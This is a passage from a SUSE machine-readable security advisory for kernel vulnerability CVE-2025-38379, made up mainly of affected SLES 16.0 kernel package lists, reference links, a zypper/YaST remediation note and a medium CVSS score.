"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38379",
"url": "https://www.suse.com/security/cve/CVE-2025-38379"
},
{
"category": "external",
"summary": "SUSE Bug 1247030 for CVE-2025-38379",
"url": "https://bugzilla.suse.com/1247030"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
